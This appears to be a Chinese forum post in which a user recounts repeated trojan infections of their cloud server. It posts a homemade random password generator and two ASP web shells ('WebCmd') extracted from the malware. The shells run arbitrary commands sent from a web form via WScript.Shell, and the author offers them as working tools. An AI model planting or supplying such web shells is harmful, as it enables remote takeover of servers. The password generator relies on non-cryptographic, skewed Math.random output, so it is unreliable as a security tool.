小学生日记，又中木马了，这次简单的研究一下。顺便提个webcmd出来用 - 〖系统安全〗

z3960

级别: 茶馆馆主

发帖: 770593

飞翔币: 207694

威望: 215657

飞扬币: 2511651

信誉值: 8

只看楼主更多操作 0 发表于: 2022-09-16

小学生的云机又中木马了，以前密码123456用了3年都没事，现在好乱，一周就中毒了，密码加了字母又加符号，还是中毒都已经改用随机密码了，待会儿就分享一个简单的密码生成。之前中毒也看到一个乱码文件，没想太多，就直接删了，然后改密码。继续用。这次又中毒了，所以决定看看。直接打开看不了，所以跑一下，在网页源码抓几个关键字bing一下，就知道这东西叫大马。我以为这个是一个叫大马的人做的病毒。看了好多文章才知道，这大型的叫大马，一句话病毒叫小马。又看到很多写着无后门的病毒下了几个，在本地跑。结果都有后门，两个木马在互杀，电脑直接挂了。最后发现我电脑administrator不是管理员，电脑都无权限。还是不跑大马了。直接禁用iis。用火绒盾把残留的都关掉。用net user添加回管理组，发现cmd没权限，想写bat，c盘没权限，d盘也没权限。还好用户目录是可以用的。写好后，右键管理员运行，重启就发现d盘可以随便用了。总之，不要信任何木马无后门。大马的功能还不错，可以野利用，但是用f12，能看到不停连接其它肉机。火绒还发现在大马用xmlhttp发东西。但是好像用这功能，于是决定提取要的功能出来。提出来发现不运行，还好以前看过asp，发现是大马改了涵数。定位了好久才找到。连shell都写在数组中，找了好久才凑够一个页面的源码。

小学生的密码生成器
复制代码 隐藏代码<!DOCTYPE html><html><head> <meta charset="utf-8"> <meta name="MobileOptimized" content="320"> <title> 随机密码基</title><style>@font-face { font-family: "iconfont"; /* Project id */ src: url('data:application/octet-stream;base64,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') format('truetype');}.iconfont { font-family: "iconfont" !important; font-size: 16px; font-style: normal; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;}.icon-copy:before { content: "e67f";}.form-row { display: -ms-flexbox; display: flex; -ms-flex-wrap: wrap; flex-wrap: wrap; margin-right: -5px; margin-left: -5px;}.shadow { box-shadow: 0 .5rem 1rem rgba(0,0,0,.15)!important;}.col-md-6 { position: relative; width: 100%; padding-right: 15px; padding-left: 15px;}@media(min-width: 1200px){html { font-size: 138% !important; }.col-md-6 { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%;}}*, ::after, ::before { box-sizing: border-box;}.custom-select { width:60%; padding: 0.5rem 1rem; background: #fff url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='4' height='5' viewBox='0 0 4 5'%3e%3cpath fill='%233e3f3a' d='M2 0L0 2h4zm0 5L0 3h4z'/%3e%3c/svg%3e") no-repeat right .75rem center/8px 10px; -moz-appearance: none; appearance: none;}.ck{margin-bottom: 32px;}#zd{width:100%;}.card-header button{ padding: 6px 12px; border-radius: 33px;}.card-header { text-align: center; background: #ccc; padding: 5px;}.card-body { text-align: center;}#output{font-weight: 700;font-size:300%;background: #f55;color: #fff;padding: 11px 33px;}#copycode{border: 2px solid #f55;background: #fff;color: #f55;}#pw:active {opacity: 0;transition: 0s}#pw{transition: all 2s;//:active按下动画animation-name: animatetop;animation-duration: 2s}@keyframes animatetop { from { opacity:0} to { opacity:1}}</style></head><body><div class="form-row"><div class="col-md-6 shadow "> <div class="input-group"> 密码长度： <select id="pgLength" class="custom-select"> <option value="1">1</option> <option value="2">2</option> <option value="3">3</option> <option value="4">4</option> <option value="5">5</option> <option value="6" selected>6</option> <option value="7">7</option> <option value="8">8</option> <option value="9">9</option> <option value="10">10</option> <option value="11">11</option> <option value="12">12</option> <option value="13">13</option> <option value="14">14</option> <option value="15">15</option> <option value="16">16</option> <option value="17">17</option> <option value="18">18</option> <option value="19">19</option> <option value="20">20</option> <option value="21">21</option> <option value="22">22</option> <option value="23">23</option> <option value="24">24</option> <option value="25">25</option> <option value="26">26</option> <option value="27">27</option> <option value="28">28</option> <option value="29">29</option> <option value="30">30</option> <option value="31">31</option> <option value="32">32</option> <option value="33">33</option> <option value="34">34</option> <option value="35">35</option> <option value="36">36</option> </select> </div> <div class="ck"> <input type="checkbox" checked id="chkl"> <label for="chkl"> 小写字母(a..z) </label> <br> <input type="checkbox" checked id="chku"> <label for="chku"> 大写字母(A..Z) </label> <br> <input type="checkbox" checked id="chkn"> <label for="chkn"> 数字(0..9) </label> <br> <input type="checkbox" id="chksc"> <label for="chksc"> 特殊字符 </label> <br> <input type="checkbox" id="chkzd"><label for="chkzd"> 自定义</label> <div class=zd style="display:none"> <textarea id="zd" rows="6">字典</textarea> <br> <button id='zdl' onclick="generateZD();"> 生成字典1</button> <button id='zd2' onclick="generateZD2();"> 生成字典2</button> </div> </div></div> <div class="col-md-6"> <div class="card-header"> <button id='pw' onclick="generatePassword();"> 生成密码</button> <button id="copycode"><span class="icon iconfont icon-copy"></span> 复制</button> </div> <div class="card-body"> <h5><span id="output">aC0*vN</span></h5> </div> </div></div><script>function $(j8) {return document.querySelector(j8);}function al(j,k) {b="";for (var i=j;i<k;i++){ b+=String.fromCharCode(i);}return b;} $( "#pgLength" ).onchange=generatePassword; $( "#chkl" ).onchange=generatePassword; $( "#chku" ).onchange=generatePassword; $( "#chkn" ).onchange=generatePassword; $( "#chksc" ).onchange=generatePassword; $( "#chkzd" ).onchange=function(){ v=$(".ck .zd").style; console.log("%c"+v.display, "color:red"); if($("#chkzd").checked){ v.display=''; }else{ v.display='none'; } }function generateZD(){$("#zd").value=al(33,127);}function generateZD2(){$("#zd").value=al(161,256);}function generatePassword(){ $("#output").innerText=''; var length = $("#pgLength").value; var zd = $("#zd").value; var string = "abcdefghijklmnopqrstuvwxyz"; var strUpper="ABCDEFGHIJKLMNOPQRSTUVWXYZ"; var numeric = '0123456789'; var punctuation = '!@#$%^&*()_+~`|}{[]:;?><,./-='; var password = ""; while( password.length<length ) { entity1 = Math.ceil(string.length * Math.random()*Math.random()) - 1; entity2 = Math.ceil(numeric.length * Math.random()*Math.random()) - 1; entity3 = Math.ceil(punctuation.length * Math.random()*Math.random()) - 1; entity4 = Math.ceil(strUpper.length * Math.random()*Math.random()) - 1; entity5 = Math.ceil(zd.length * Math.random()*Math.random()) - 1; if($("#chkl").checked || $("#chku").checked || $("#chkn").checked || $("#chksc").checked || $("#chkzd").checked) { if($("#chkl").checked && password.length<length){ password += string.charAt( entity1 ); } if($("#chku").checked && password.length<length){ password += strUpper.charAt( entity4 ); } if($("#chkn").checked && password.length<length ){ password += numeric.charAt( entity2 ); } if($("#chksc").checked && password.length<length){ password += punctuation.charAt( entity3 ); } if($("#chkzd").checked && password.length<length){ password += zd.charAt( entity5 ); } } else { $("#chkn").checked=true; //break; } } if(password.trim()) { $("#output").innerText=password.trim(); } else { $("#output").innerText="请勾选选项！"; }}$('#copycode').onclick=function() {var o=document.getElementById("output");//o.select(); // 选择对象//document.execCommand("Copy"); // 执行浏览器复制命令const input = document.createElement('input'); document.body.appendChild(input); input.setAttribute('value', o.innerText); input.select(); document.execCommand('copy'); document.body.removeChild(input); v=$("#copycode"); cc=v.innerHTML; v.innerHTML="已复制"; v.style.transition='2s'; v.style.opacity=0; setTimeout(function(){ v.innerHTML=cc;v.style.opacity=1; }, 2000);}generatePassword();</script></body></html>提取第一个大马，有二个方式，直接ws，和ws映射文本再读取文本［截图放不出来］
复制代码 隐藏代码<head><title>WebCmd</title><style type="text/css">body,textarea,input{background:#000;color:#fff;}textarea,input{border-radius:13px;border:1px solid #fff;margin:1px;}</style></head><%'Server.ScriptTimeout=999999999:Response.Buffer =trueOn Error Resume Nextsub ShowErr()If Err ThenRRS"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"Err.ClearResponse.FlushEnd Ifend subSub RRS(str)response.write(str)End SubDim ObT(13,2):ObT(0,0) = "Scripting.FileSystemObject":ObT(0,2) = "文件操作组件":ObT(1,0) = "wscript.shell":ObT(1,2) = "命令行执行组件":ObT(2,0) = "ADOX.Catalog":ObT(2,2) = "ACCESS建库组件":ObT(3,0) = "JRO.JetEngine":ObT(3,2) = "ACCESS压缩组件":ObT(4,0) = "Scripting.Dictionary" :ObT(4,2) = "数据流上传辅助组件":ObT(5,0) = "Adodb.connection":ObT(5,2) = "数据库连接组件":ObT(6,0) = "Adodb.Stream":ObT(6,2) = "数据流上传组件":ObT(7,0) = "SoftArtisans.FileUp":ObT(7,2) = "SA-FileUp 文件上传组件":ObT(8,0) = "LyfUpload.UploadFile":ObT(8,2) = "刘云峰文件上传组件":ObT(9,0) = "Persits.Upload.1":ObT(9,2) = "ASPUpload 文件上传组件":ObT(10,0) = "JMail.SmtpMail":ObT(10,2) = "JMail 邮件收发组件":ObT(11,0) = "CDONTS.NewMail":ObT(11,2) = "虚拟SMTP发信组件":ObT(12,0) = "SmtpMail.SmtpMail.1":ObT(12,2) = "SmtpMail发信组件":ObT(13,0) = "Microsoft.XMLHTTP":ObT(13,2) = "数据传输组件"Function Cmd1Shell()checked=" checked"If Request("SP")<>"" Then Session("ShellPath") = Request("SP")ShellPath=Session("ShellPath")if ShellPath="" Then ShellPath = "cmd.exe"if Request("wscript")<>"yes" then checked=""If Request("cmd")<>"" Then DefCmd = Request("cmd")SI="<form method='post'>"SI=SI&"SHELL路径：<input name='SP' value='"&ShellPath&"' Style='width:70%'> "SI=SI&"<input class=c type='checkbox' name='wscript' value='yes'"&checked&">WScript.Shell"SI=SI&"<input name='cmd' Style='width:92%' value='"&DefCmd&"'> <input type='submit' value='执行'><textarea Style='width:100%;height:440;' class='cmd'>"If Request.Form("cmd")<>"" Thenif Request.Form("wscript")="yes" thenSet CM=CreateObject(ObT(1,0))Set DD=CM.exec(ShellPath&" /c "&DefCmd)aaa=DD.stdout.readallSI=SI&aaaelseOn Error Resume Nextif ws="" Then Set ws=Server.CreateObject("WScript.Shell")Set fso=Server.CreateObject("Scripting.FileSystemObject")szTempFile = server.mappath("cmd.txt")Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)Set fs = CreateObject("Scripting.FileSystemObject")Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)aaa=Server.HTMLEncode(oFilelcx.ReadAll)oFilelcx.CloseCall fso.DeleteFile(szTempFile, True)SI=SI&aaaend ifEnd IfSI=SI&chr(13)&"</textarea></form>"RRS SIEnd FunctionCmd1Shell()ShowErr()%>第二个大马，调用clsid拿到ws

复制代码 隐藏代码<style> body,tr,td { margin-top: 5px; background-color: #000000; color: #006000; font-size: 12px; scrollbar-face-color: #232323; scrollbar-arrow-color: #383839; scrollbar-highlight-color: #383839; scrollbar-3dlight-color: #dddddd; scrollbar-shadow-color: #232323} input,select,textarea { border-top-width: 1px; font-weight: bold; border-left-width: 1px; font-size: 11px; border-left-color: #dddddd; background: #000000; border-bottom-width: 1px; border-bottom-color: #dddddd; color: #dddddd; border-top-color: #dddddd; font-family: verdana; border-right-width: 1px; border-right-color: #dddddd; }</style><object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object><object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object><%Sub RRS(str)response.write(str)End SubSub j(str)response.write(str)End Subfunction Cmdx()j("<center><form method='post'> ")j("<input type=text name='cmdx' size=60 value='cmd.exe'><br> ")j("<input type=text name='cmd' size=60><br> ")j("<input type=submit value='Sumbit'></form> ")j("<textarea readonly cols=150 rows=27> ")On Error Resume Nextj oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readallj("</textarea></center>")end functioncmdx()RRS"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"Err.ClearResponse.Flush%>可以拿来控自己电脑，但要小心别被木马利用了。本来想写个长文，分析代码，无奈键盘坏了，这文章在草稿里几天了。现在又不想写那么长了，真的累坏小学生了